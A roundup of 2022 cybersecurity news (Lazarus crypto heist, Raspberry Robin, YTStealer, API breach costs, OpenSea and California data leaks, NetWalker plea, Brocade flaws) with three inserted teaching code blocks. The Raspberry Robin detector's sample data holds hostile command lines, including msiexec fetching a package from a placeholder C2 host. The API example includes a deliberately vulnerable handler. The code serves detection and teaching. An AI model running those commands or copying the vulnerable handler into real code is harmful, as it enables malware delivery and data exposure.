Lazarus Group Responsible For $100M Crypto-Heist


Cyber security researchers have found Lazarus Group responsible for stealing $100m worth of crypto via the Horizon Bridge run by Harmony, a California-based company. Lazarus Group is a well-known North Korean state-sponsored hacking group that was also behind the theft of $620 million worth of crypto from the Ronin exchange in March. 

Following the incident, blockchain forensics company Elliptic last week alerted Harmony's cybersecurity team that its cross-chain bridge had been attacked. 

“There are strong indications that North Korea’s Lazarus Group may be responsible for this theft, based on the nature of the hack and the subsequent laundering of the stolen funds,” Elliptic wrote. 

Additionally, Reuters reported that Chainalysis, a blockchain analytics firm, is also investigating alongside Harmony; it says the attack style is similar to previous attacks attributed to North Korea-linked actors.

“On Thursday, June 23, 2022, the Harmony Protocol team was notified of a malicious attack on our proprietary Horizon Ethereum Bridge. At 5:30 AM PST, multiple transactions occurred that compromised the bridge with 11 transactions that extracted tokens stored in the bridge,” the company said in its blog. 

As the name suggests, Blockchain bridges allow users to transfer their crypto assets from one blockchain to another. The malicious actors stole $100 million in crypto assets, including Ethereum (ETH), Binance Coin, Tether, USD Coin, EOS, and Dai. 

Elliptic said that the hack was carried out by compromising the cryptographic keys of a multi-signature wallet, a technique commonly used by the suspected group. 

“Lazarus Group tends to focus on APAC-based targets, perhaps for language reasons referring to the Asia-Pacific region. Although Harmony is based in the US, many of the core team have links to the APAC region,” Elliptic added. 

Further, the report says that two days after the attack Harmony offered the group a $1 million bounty for the return of the Horizon bridge funds. Researchers have also reported that they have identified the offenders behind the $100 million hack.

Microsoft Detects Raspberry Robin Worm in Windows Networks

According to Microsoft, a recently detected Windows worm has been discovered on the networks of hundreds of firms from numerous industry sectors. 

The malware, called Raspberry Robin, spreads via infected USB devices and was discovered by Red Canary intelligence experts in September 2021. In early November, cybersecurity company Sekoia observed it using QNAP NAS devices as command and control (C2) servers, while Microsoft said it found malicious artefacts tied to this worm dating back to 2019. 

Redmond's findings are consistent with those of Red Canary's Detection Engineering team, which discovered this worm on the networks of several clients, including several in the technology and manufacturing industries. Although Microsoft saw the malware communicating with Tor network addresses, the threat actors have yet to exploit the access they gained to their victims' networks. 

As mentioned, Raspberry Robin spreads to new Windows systems via infected USB drives containing a malicious .LNK file. When the USB device is connected and the user clicks the shortcut, the worm spawns a msiexec process via cmd.exe to launch a malicious file stored on the infected drive. It infects new Windows devices, communicates with its command and control (C2) servers, and executes malicious payloads using several legitimate Windows utilities: 
  • fodhelper (a trusted binary for managing features in Windows settings),
  • msiexec (command line Windows Installer component),
  • and odbcconf (a tool for configuring ODBC drivers).
"While msiexec.exe downloads and executes legitimate installer packages, adversaries also leverage it to deliver malware," Red Canary researchers explained. "Raspberry Robin uses msiexec.exe to attempt external network communication to a malicious domain for C2 purposes."
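The execution chain described above (cmd.exe launching msiexec from the USB drive, msiexec reaching out to a remote domain, odbcconf and fodhelper appearing where they do not belong) can be turned into process-creation detection rules. The block below is an added example, not code from the article, Microsoft or Red Canary; the telemetry, drive letter and domain are constructed placeholders.

```python
"""Detection rules for the Raspberry Robin execution chain described above.

Added example: the events below are constructed to resemble process-creation
telemetry and are not real logs.
"""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    parent: str   # parent process image name
    image: str    # created process image name
    cmdline: str  # full command line of the created process


# Legitimate Windows utilities the article names as abused by the worm.
ABUSED_LOLBINS = {"fodhelper.exe", "msiexec.exe", "odbcconf.exe"}
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# Assumption: the system drive is C:, so a package on any other drive letter
# is treated as removable or external media for this heuristic.
NON_SYSTEM_DRIVE_RE = re.compile(r"\b[D-Z]:\\", re.IGNORECASE)


def detect(event: ProcEvent) -> list[str]:
    """Return the names of the rules an event matches (empty list = benign)."""
    parent, image, cl = event.parent.lower(), event.image.lower(), event.cmdline
    hits: list[str] = []
    if image == "msiexec.exe":
        # Windows Installer asked to fetch a package over the network: the
        # behaviour Red Canary describes as the worm's C2 attempt.
        if URL_RE.search(cl):
            hits.append("msiexec_remote_package")
        # cmd.exe (spawned from the .LNK) launching a package that lives on a
        # non-system drive matches the USB-borne infection chain.
        if parent == "cmd.exe" and NON_SYSTEM_DRIVE_RE.search(cl):
            hits.append("msiexec_from_removable_media_via_cmd")
    if image == "odbcconf.exe" and parent in {"cmd.exe", "msiexec.exe"}:
        # odbcconf driven by a script or installer rather than an admin session.
        hits.append("odbcconf_spawned_by_installer_chain")
    if parent == "fodhelper.exe" and image in ABUSED_LOLBINS | {"cmd.exe", "powershell.exe"}:
        # fodhelper.exe normally opens the Settings app, not a shell or installer.
        hits.append("fodhelper_unexpected_child")
    return hits


def triage(events: list[ProcEvent]) -> dict[str, list[str]]:
    """Map each suspicious command line to the rules it matched."""
    return {e.cmdline: hits for e in events if (hits := detect(e))}


# Constructed sample telemetry. Drive D: stands in for the USB stick and
# c2.placeholder.example for the malicious domain named in the reports.
SAMPLE_EVENTS = [
    ProcEvent("explorer.exe", "cmd.exe", r"cmd.exe /c start msiexec /q /i D:\setup.msi"),
    ProcEvent("cmd.exe", "msiexec.exe", r"msiexec /q /i D:\setup.msi"),
    ProcEvent("cmd.exe", "msiexec.exe", "msiexec /q /i http://c2.placeholder.example:8080/pkg"),
    ProcEvent("msiexec.exe", "odbcconf.exe", r"odbcconf.exe /a {REGSVR C:\Users\Public\x.dll}"),
    ProcEvent("fodhelper.exe", "cmd.exe", "cmd.exe /c whoami"),
    ProcEvent("services.exe", "msiexec.exe", "msiexec.exe /V"),  # Installer service: benign
    ProcEvent("explorer.exe", "msiexec.exe", r"msiexec /i C:\Users\alice\Downloads\tool.msi"),  # benign
]

if __name__ == "__main__":
    for cmdline, rules in triage(SAMPLE_EVENTS).items():
        print(f"{', '.join(rules):45s} {cmdline}")
```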

Security specialists who have seen Raspberry Robin in the wild have yet to link the malware to a threat group and are still working to determine its operators' ultimate objective. Nonetheless, Microsoft has labelled this campaign as high-risk, considering that the attackers could download and deploy additional malware inside the victims' networks and escalate their privileges at any time.

Susceptible APIs Costing Organizations Billions Every year

 

Last week, threat intelligence firm Imperva published a report titled ‘Quantifying the Cost of API Insecurity’, which examined nearly 117,000 security incidents and found that API insecurity was responsible for annual losses of between $41 billion and $75 billion globally. 

The study conducted by the Marsh McLennan Cyber Risk Analytics Center discovered that larger enterprises had a higher threat of having API-related breaches, with organizations making more than $100 billion in revenue being three to four times more likely to face API insecurity than small or midsize enterprises. 

The security analysts identified that Asia has a high incident rate with between 16% and 20% of cyber-security incidents related to API insecurity. This is likely due to the rapid digital transformation happening across Asia, especially in regard to mobile, as the majority of digital transactions in Asia are done through mobile. 

How are businesses getting API security so wrong?

An API is the invisible connective tissue that allows applications to transfer data to enhance end-user experiences and results. "The growing security risks associated with APIs correlate with the proliferation of APIs," says Lebin Cheng, vice president of API security for Imperva. 

"The volume of APIs used by businesses is growing rapidly — nearly half of all businesses have between 50 and 500 deployed, either internally or publicly, while some have over a thousand active APIs." 

Businesses are frequently failing to secure APIs: 95% of enterprises suffered an API security incident in the last 12 months, and 34% acknowledge they lack any kind of API security methodology, despite running APIs in production. 

“Many organizations are failing to protect their APIs because it requires equal participation from the security and development teams,” Cheng explained. “Historically, these groups have been at odds — security is the party of no, and devops is irresponsible and moves too fast. In order to address these challenges, security leaders have to enable application developers to create secure code using technology that is lightweight and works efficiently." 

Tips for enhancing API security:

Imperva recommended organizations adopt API governance by monitoring endpoints beyond their organizations. They should also monitor the data flowing through them to ensure that sensitive information is protected. 

Any methodology that security teams implement should include API discovery and data classification, so that security teams can identify each API's schema, spot and classify the data that passes through it, and test it to unearth potential vulnerabilities.

A New YTStealer Malware Targets YouTube Content Creator

Google Threat Analysis Group (TAG) has recently uncovered a new information-stealing malware, named 'YTStealer', that targets YouTube content creators by stealing their authentication cookies. Malicious actors sell the stolen data as a service on the dark web and distribute the malware through fake installers that also drop RedLine Stealer and Vidar. 

"What sets YTStealer aside from other stealers sold on the dark web market is that it is solely focused on harvesting credentials for one single service instead of grabbing everything it can get ahold of," security researcher Joakim Kennedy said in a report published on Wednesday.

As per the research, the malware extracts YouTube authentication cookie information from the web browser's database files in the user's profile folder; then it opens a headless browser and connects to YouTube’s Studio page, which is used by content creators to control the content of the videos they produce.

Further, the malware steals all available personal data of users including the account name, number of subscribers, age, and whether channels are monetized. Following this, it encrypts all data samples with a unique key and sends both to a command and control server. 

The malware's files are disguised as installers for legitimate tools and software, including:
  • OBS Studio, a piece of open-source streaming software 
  • Audio applications and plugins such as Antares Auto-Tune Pro, Valhalla DSP, FabFilter Total, and Xfer Serum 
  • Video editing software, including Adobe Premiere Pro, Filmora, and HitFilm Express 
  • Game mods and cheats for games such as Grand Theft Auto V, Roblox, Counter-Strike, and Call of Duty 
  • “Cracks” for legitimate software or services including Norton Security, Malwarebytes, Discord Nitro, Stepn, and Spotify Premium 
  • Driver tools such as “Driver Booster” and “Driver Easy”
The researchers also found that the files used to install the malware on targeted devices were loaded with other credential stealers, including RedLine, Vidar, Predator The Thief, Masad, Nexus stealer, Azorult, Vikro Stealer, Raccoon, Grand Stealer, and Kantal, along with open-source malware such as Sorano and AdamantiumThief.

California Gun Permit Website Exposes User Data

 

About the Data Leak

A California state website disclosed the private information of anyone who registered for a CCW (Concealed Carry Weapons) permit between 2011 and 2021. The California Department of Justice says the incident happened last week, when the state's firearms dashboard portal was overwhelmed. 

Besides the portal breach, the data was also leaked through several other online dashboards: Assault Weapon Registry, Dealer Record of Sale, Firearm Safety Certificate, Certified for Sale, and Gun Violence Restraining Order. 

What are the experts saying?

"The California cyber-gaffe comes at a time when data privacy is at the forefront of the national debate, in large part because of the US Supreme Court's recent decision to overturn Roe vs. Wade, which has called into question what personal data is collected, retained — and potentially sold or shared," reports the Register. 

The California Department of Justice says that the data and dashboards were accessible to the public for 24 hours. The leaked data includes gender, race, date of birth, driver's license information, criminal histories, and addresses; it did not, however, expose financial information or social security numbers. 

Info exposed in the Data Leak 

Still, some personal information may have been shared on social media, says the Fresno County Sheriff's Office, which found the data leak. The state DOJ will notify Californians whose data was leaked and will provide additional details soon, including credit monitoring services for impacted users. 

"I immediately launched an investigation into how this occurred at the California Department of Justice and will take strong corrective measures where necessary," said Rob Bonta, California Attorney General, in a statement. He also said that he was deeply sorry and unsettled by the incident. 

The office did not address the issue immediately and declined to provide the number of users affected, or the number of California residents who apply for a concealed weapons permit each year but are denied. 

Tim Marley, VP for audit, risk, and compliance at Cerberus Sentinel said that "the failure to keep stakeholders' sensitive data confidential is coming with greater consequences for organizations in the United States."

Netwalker: Ex Canadian Government Employee Pleads Guilty to Cybercrimes 

 

A former Government of Canada employee pleaded guilty in a US court to crimes related to data theft stemming from his involvement with the NetWalker ransomware group. 

Sebastien Vachon-Desjardins admitted on Tuesday that he had planned to commit bank fraud and phishing scams, intentionally damaged a protected computer, and also sent another demand regarding that illegally damaged computer. 

Plea agreement filed

Vachon-Desjardins, 34, who had previously been sentenced to six years and eight months in prison after entering a guilty plea to five criminal offenses in Canada, was deported to the United States in March. 
Vachon-Desjardins is "one of the most prolific NetWalker Ransomware affiliates," as per his plea agreement, and was in charge of extorting millions of dollars from several businesses all over the world. Along with 21 laptops, smartphones, game consoles, and other technological devices, he will also forfeit $21.5 million. 

He has pleaded guilty to conspiracy to commit computer fraud, conspiracy to commit wire fraud, intentionally harming a protected computer, and conveying a demand related to intentionally damaging a protected computer, according to a court filing submitted this week. The accusations carry a maximum combined punishment of 40 years in jail. The attorneys did not identify the targeted business, but they did indicate that it is based in Tampa and was attacked on May 1, 2020. 

 NetWalker gang's collapse

NetWalker, a ransomware-as-a-service operation, first surfaced in 2019; its creators are thought to be based in Russia. Its standard procedure, a profitable strategy known as double extortion, involves acquiring sensitive personal data, encrypting it, and then holding it hostage in exchange for cryptocurrency, with the threat of exposing the material online if the victim does not pay.

According to reports, the NetWalker gang intentionally targeted the healthcare industry during the COVID-19 pandemic to take advantage of the global disaster. As one of the NetWalker gang's 100 affiliates, Vachon-Desjardins is suspected of being connected to at least 91 attacks since April 2020, and of also working for other RaaS groups such as Sodinokibi (REvil), Suncrypt, and Ragnarlocker. 

As part of the takedown of the NetWalker gang, the Feds dismantled the crime gang's servers and the dark web site it used to contact ransomware victims. They then went after Vachon-Desjardins, who, according to the FBI, made $27 million for the NetWalker gang. 

His role in cybercrime is said to have included gathering information on victims, managing the servers hosting tools for reconnaissance, privilege escalation, data theft, as well as running accounts that posted the stolen data on the data leak site and collecting payments following a successful attack. 

Some victims did pay, however, and the plea deal connected Vachon-Desjardins to the successful extortion of roughly 1,864 Bitcoin in ransom payments, or about $21.5 million, from multiple businesses around the world.

Google Blocked Dozens of Domains Used by Hack-for-hire Groups

 

Google's Threat Analysis Group released a blog post on Thursday detailing the actions of hack-for-hire groups in Russia, India, and the United Arab Emirates. More than 30 domains used by these threat groups have been added to the internet giant's Safe Browsing system, preventing users from accessing them. 

Hack-for-hire groups are sometimes confused with businesses that provide surveillance tools. As per Google, surveillance vendors often give the tools required for spying but leave it up to the end-user to run them, whereas hack-for-hire groups perform the attacks themselves. Several hack-for-hire groups have been found in recent years. Google's investigation focuses on three groups thought to be based in India, Russia, and the United Arab Emirates. 

Google has been tracking the threat actor linked to India since 2012, with some of its members formerly working for offensive security firms. They now appear to be employed by Rebsec, a new firm that publicly sells corporate espionage services. The group has been observed phishing credentials for AWS, Gmail, and government services accounts from healthcare, government, and telecom firms in the Middle East. 

The Russia-linked threat actor, known to others as Void Balaur, has targeted journalists, politicians, NGOs and other organisations, and people who appeared to be ordinary residents of Russia and neighbouring nations. Phishing was also used in these attacks. 

“After the target account was compromised, the attacker generally maintained persistence by granting an OAuth token to a legitimate email application like Thunderbird or generating an App Password to access the account via IMAP. Both OAuth tokens and App Passwords are revoked when a user changes their password,” explained Shane Huntley, director of Google’s Threat Analysis Group. 

This group also had a public website where it advertised social media and email account hacking services. The UAE group primarily targets government, political, and educational groups in North Africa and the Middle East. This threat actor also employs phishing emails, but unlike many other organisations, it employs a custom phishing kit rather than open source phishing frameworks. 

“After compromising an account, the actor maintains persistence by granting themselves an OAuth token to a legitimate email app like Thunderbird, or by linking the victim Gmail account to an attacker-owned account on a third-party mail provider. The attacker would then use a custom tool to download the mailbox contents via IMAP,” Huntley said. 

Google believes Mohammed Benabdellah, who was sued by Microsoft in 2014 for developing the H-Worm (njRAT) malware, is associated with the group.

NFT Marketplace OpenSea Suffers a Major Data Breach

 

Earlier this week, NFT marketplace OpenSea revealed a data breach and warned users of phishing assaults that could target them in the coming days. 

The company's Head of Security, Cory Hardman, said that an employee of its email delivery vendor, Customer.io, allegedly downloaded and shared stored email addresses linked with OpenSea accounts and newsletter subscriptions with an unknown third party. 

"If you have shared your email with OpenSea in the past, you should assume you were impacted. We are working with Customer.io in their ongoing investigation, and we have reported this incident to law enforcement," Hardman stated. "Because the data compromise included email addresses, there may be a heightened likelihood for email phishing attempts." 

The crypto platform has more than 600,000 users and a transaction volume that surpassed $20 billion earlier this January. Customers were also told to look for emails sent from domains that hackers could exploit to spoof OpenSea's official email domain opensea.io. 

Examples of domains that could be employed in phishing attacks targeting OpenSea users include opensea.org, opensea.xyz, and opeansae.io.

Additionally, the company shared a set of safety recommendations to help defend against phishing attempts, advising users to be suspicious of any emails trying to mimic OpenSea, not to download and open email attachments, and to check the URLs of pages linked in OpenSea emails.

Users are also urged never to share or confirm their passwords or secret wallet phrases and never to sign wallet transactions if prompted directly via email.
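The lookalike domains OpenSea warned about (opensea.org, opensea.xyz, opeansae.io) are a TLD swap and a typosquat of the official opensea.io. The check below, an added example that is not OpenSea's or Customer.io's code, classifies a sender address against that one legitimate domain; the two-label "registrable domain" shortcut and the two-edit radius are assumptions of this example, not something the article states.

```python
"""Classify e-mail sender domains as legitimate, lookalike or unrelated
relative to the official OpenSea domain named in the article.

Added example; addresses in the tests are constructed.
"""
from __future__ import annotations

LEGIT_DOMAIN = "opensea.io"                 # official domain named by OpenSea
LEGIT_LABEL = LEGIT_DOMAIN.split(".")[0]    # "opensea"
MAX_EDITS = 2   # assumption: labels within two edits are treated as typosquats


def osa_distance(a: str, b: str) -> int:
    """Optimal string alignment distance: Levenshtein plus adjacent transpositions,
    so that a swapped letter pair (se -> es) costs one edit, not two."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[len(a)][len(b)]


def sender_domain(address: str) -> str:
    """Domain part of an address, lower-cased and without a trailing dot."""
    return address.rsplit("@", 1)[-1].strip().rstrip(".").lower()


def classify_sender(address: str) -> str:
    """Return 'legitimate', 'lookalike' or 'unrelated' for the sender's domain."""
    domain = sender_domain(address)
    if domain == LEGIT_DOMAIN or domain.endswith("." + LEGIT_DOMAIN):
        return "legitimate"          # the real domain or one of its subdomains
    labels = domain.split(".")
    # Assumption: the registrable name is the second-to-last label (no public
    # suffix list here, so co.uk-style suffixes would need extra handling).
    sld = labels[-2] if len(labels) >= 2 else labels[0]
    if sld == LEGIT_LABEL:
        return "lookalike"           # same name, different TLD: opensea.org, opensea.xyz
    if LEGIT_LABEL in sld or LEGIT_LABEL in labels:
        return "lookalike"           # brand embedded in the name or used as a subdomain
    if osa_distance(sld, LEGIT_LABEL) <= MAX_EDITS:
        return "lookalike"           # typosquat such as opeansae.io
    return "unrelated"


if __name__ == "__main__":
    for addr in ["support@opensea.io", "alerts@opensea.org", "team@opeansae.io",
                 "help@opensea.io.attacker.example", "alice@example.com"]:
        print(f"{classify_sender(addr):11s} {addr}")
```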

"We wanted to share the information we have at this time, and let you know that we've reported the incident to law enforcement and are cooperating in their investigation," Hardman added. 

Recently, crypto platforms have emerged as a lucrative target for malicious hackers as the industry witnesses rapid growth and money flooding in. Blockchain-based, decentralized networks promise better security, but average users today lean toward centralized services like OpenSea for their convenience. 

Earlier in March, a data leak at HubSpot, a customer-relations management software firm, led to data breaches at BlockFi, Circle, and others. Fractal, an NFT platform started by Twitch co-founder Justin Kan, had a rocky debut last year in December after a fraudster hacked the announcement bot to siphon $150,000.

Iranian Hackers: Israeli Tourism Sites Targeted

Malware targeted the websites of the Israeli public transportation companies Dan and Kavim, a children's museum, and a public radio blog. Reportedly, none of the sites were reachable by Saturday noon.

On Tuesday, the Sharp Boys hacking group claimed to have stolen data from Israeli travel websites, including ID numbers, addresses, credit card details, and more.

Websites were compromised 

According to the hackers, the affected websites are hotels.co.il, isrotel.com, minihotel.co.il, tivago.co.il, and danhotels.com. On Tuesday morning, hotels.co.il was inaccessible, according to the company; by Tuesday afternoon, the site loaded again. 

On Friday night, the hackers posted a message on Telegram: "Hello once more! If you don't want your data disclosed by us, contact us as soon as possible." A follow-up message stated: "They did not get in touch with us, the first list of data is here," and the group posted the data online.

Later on Saturday, in a new message claiming to have more data, the gang uploaded what it said was information about customers of the Dan transportation company and a travel agency. "You are under our control no matter where you go, even on your travels. Please keep our name in mind," Sharp Boys wrote in an image shared on a Telegram account. 

Everything to know about Sharp Boys cyber gang

According to Israeli media, Sharp Boys is a hacking group with links to Iran that conducts cyber espionage for illicit purposes. 

The Sharp Boys hacker group first appeared in December, when it claimed to have compromised two Israeli hiking websites. The group also claimed to have taken control of the websites' backend administration and released a spreadsheet containing the personal data of 120,000 people. 

In December last year, the group also hacked into the Israeli insurance company Shirbit and stole vast volumes of data. When the company declined to pay the $1 million ransom demand, the group exposed the data, releasing a spreadsheet that contained personal data and credit card details for 100,000 people.

According to a report released on Tuesday by the Israeli cybersecurity firm Check Point, the average weekly number of assaults on businesses in the travel and leisure industry increased globally by 60% in June 2022 compared to the first half of June 2021.

API Security Losses Total Billions, US Companies Hit Hard


According to an analysis of breach data, US companies are the most affected by API-related breaches: in 2022, companies have lost a combined $12 billion to $23 billion from compromises linked to web application programming interfaces (APIs). 

APIs are used in Internet of Things (IoT) applications and on websites. An API is a mechanism that facilitates two software systems to interact. It controls the types of requests that take place between programs, how these requests are made, and the kinds of data formats used. For example, the Google Maps application on a mobile device does not contain names of all the streets, cities, towns, and other landmarks on your device. Instead, it connects to another application within the Google server that contains all of that information and this connection is made possible using an API. 

Data from the last decade suggests that API security has become a significant cybersecurity problem. In response, the Open Web Application Security Project (OWASP) published its list of the top 10 API security issues in 2019. 

It has explained various API weaknesses including broken authorization for objects, weak user authentication, and excessive data exposure as sensitive issues for software makers and companies that rely on cloud services. Thus, API security has become increasingly important. 

APIs work as the backend framework for mobile and web applications. Crucial and sensitive data is transferred between users, APIs, and applications and systems. Therefore, it is important to protect the sensitive data they transfer. 
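The three OWASP API weaknesses named above (broken object-level authorization, weak user authentication and excessive data exposure) are easiest to see in code. The block below is an added example written for this page, not code from Imperva, OWASP or any product mentioned here: a vulnerable order-lookup handler beside its hardened form, with an in-memory store and bearer tokens constructed as stand-ins for a database and an authentication layer.

```python
"""Vulnerable and hardened versions of an order-lookup API handler.

Added example; the orders, tokens and card numbers are constructed test data.
"""
from __future__ import annotations

from dataclasses import dataclass, asdict


@dataclass(frozen=True)
class Order:
    order_id: int
    owner_id: int
    total: float
    card_number: str    # sensitive: must never leave the service in full
    fraud_score: float  # internal field the client has no need to see


# Constructed sample data (card numbers are standard test numbers).
ORDERS = {
    1001: Order(1001, owner_id=1, total=42.0, card_number="4111111111111111", fraud_score=0.02),
    1002: Order(1002, owner_id=2, total=99.5, card_number="5555555555554444", fraud_score=0.71),
}
SESSIONS = {"tok-alice": 1, "tok-bob": 2}  # bearer token -> user id (stand-in for real auth)


class Unauthenticated(Exception):
    pass


class Forbidden(Exception):
    pass


def get_order_vulnerable(order_id: int) -> dict:
    """API1 (broken object-level authorization) and API3 (excessive data exposure):
    the caller is never identified, any id is served, and the whole record is
    serialized, card number and internal fraud score included."""
    return asdict(ORDERS[order_id])


def authenticate(token: str | None) -> int:
    """API2 (broken user authentication): fail closed on a missing or unknown
    token instead of falling back to a guest or default identity."""
    if not token or token not in SESSIONS:
        raise Unauthenticated("valid bearer token required")
    return SESSIONS[token]


def get_order_hardened(token: str | None, order_id: int) -> dict:
    """Authenticate, then enforce ownership, then return an explicit response schema."""
    user_id = authenticate(token)
    order = ORDERS.get(order_id)
    # Object-level check: the record must exist AND belong to the caller. The same
    # error for both cases keeps the endpoint from acting as an id-enumeration oracle.
    if order is None or order.owner_id != user_id:
        raise Forbidden("no such order for this user")
    # Explicit field list instead of dumping the model: only what the client needs.
    return {"order_id": order.order_id, "total": order.total,
            "card_last4": order.card_number[-4:]}


def outcome(token: str | None, order_id: int) -> str:
    """Label the result of a hardened request: 'ok', 'forbidden' or 'unauthenticated'."""
    try:
        get_order_hardened(token, order_id)
        return "ok"
    except Unauthenticated:
        return "unauthenticated"
    except Forbidden:
        return "forbidden"


if __name__ == "__main__":
    print("vulnerable, no token, someone else's order:", get_order_vulnerable(1002))
    print("hardened, alice, own order:", get_order_hardened("tok-alice", 1001))
    print("hardened, alice, bob's order:", outcome("tok-alice", 1002))
    print("hardened, no token:", outcome(None, 1001))
```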

According to the report 'Quantifying the Cost of API Insecurity', published this week by application-security firm Imperva and risk-strategy firm Marsh McLennan, cybersecurity issues will grow as APIs continue to become a common pattern for cloud and mobile devices.

"The growing security risks associated with APIs correlate with the proliferation of APIs. The volume of APIs used by businesses is growing rapidly — nearly half of all businesses have between 50 and 500 deployed, either internally or publicly, while some have over a thousand active APIs," says Lebin Cheng, vice president of API security for Imperva. 

Further, in Asia, more than 100 combined API security incidents occurred, and in the US more than 600 API security events. To prevent this, companies have to gain visibility into how they are using APIs and create a complete inventory of the API traffic in their network.

How vulnerability in Brocade Might Affect Major Companies


Broadcom disclosed that some software made by Brocade, its storage networking subsidiary, is affected by several vulnerabilities, and that the flaws can affect products from a number of large companies. A similar incident happened with HPE earlier this year.

What is the impact of the vulnerabilities?

The Brocade SAN (storage area network) management application is affected by nine flaws; patches are available for these security holes. 

Six of the vulnerabilities affect third-party components such as OpenSSL, Oracle Java, and NGINX, and are rated "medium severity" and "low severity."

An unauthorised attacker can exploit these vulnerabilities to modify data, decode data, and cause a Denial of Service (DoS) condition. 

The other three vulnerabilities are specific to Brocade SANnav and are given "high" severity risk and impact ratings. 

These vulnerabilities let an attacker obtain switch and server passwords from log files, and obtain potentially sensitive information through the use of static-key ciphers.

About the vulnerability

The security flaws (CVE-2022-28167, CVE-2022-28168 and CVE-2022-28166) were discovered internally, and no exploitation in the wild has been found so far. 

But the storage solutions of several companies that collaborate with Brocade can be impacted by these flaws. 

HPE told customers in its advisory that the company's B-series SANnav Management Portal is affected by the flaws and advised them to install the latest updates. 

The flaws can be exploited locally and remotely to leak sensitive information, gain unauthorised access, modify data, and cause a partial Denial of Service.

Other info related to Brocade vulnerability 

Another Brocade partner, NetApp, released individual advisories for the Brocade-specific SANnav vulnerabilities; NetApp's own products have not been affected. Brocade also partners with other big tech companies for storage solutions, including Huawei, Dell, Lenovo, IBM and Fujitsu. 

Security Week says "one of the other Brocade OEM partners appear to have published advisories for the SANnav vulnerabilities so it’s unclear if their products are also impacted. In the past, at least some of them did publish advisories to notify their customers about SANnav flaws."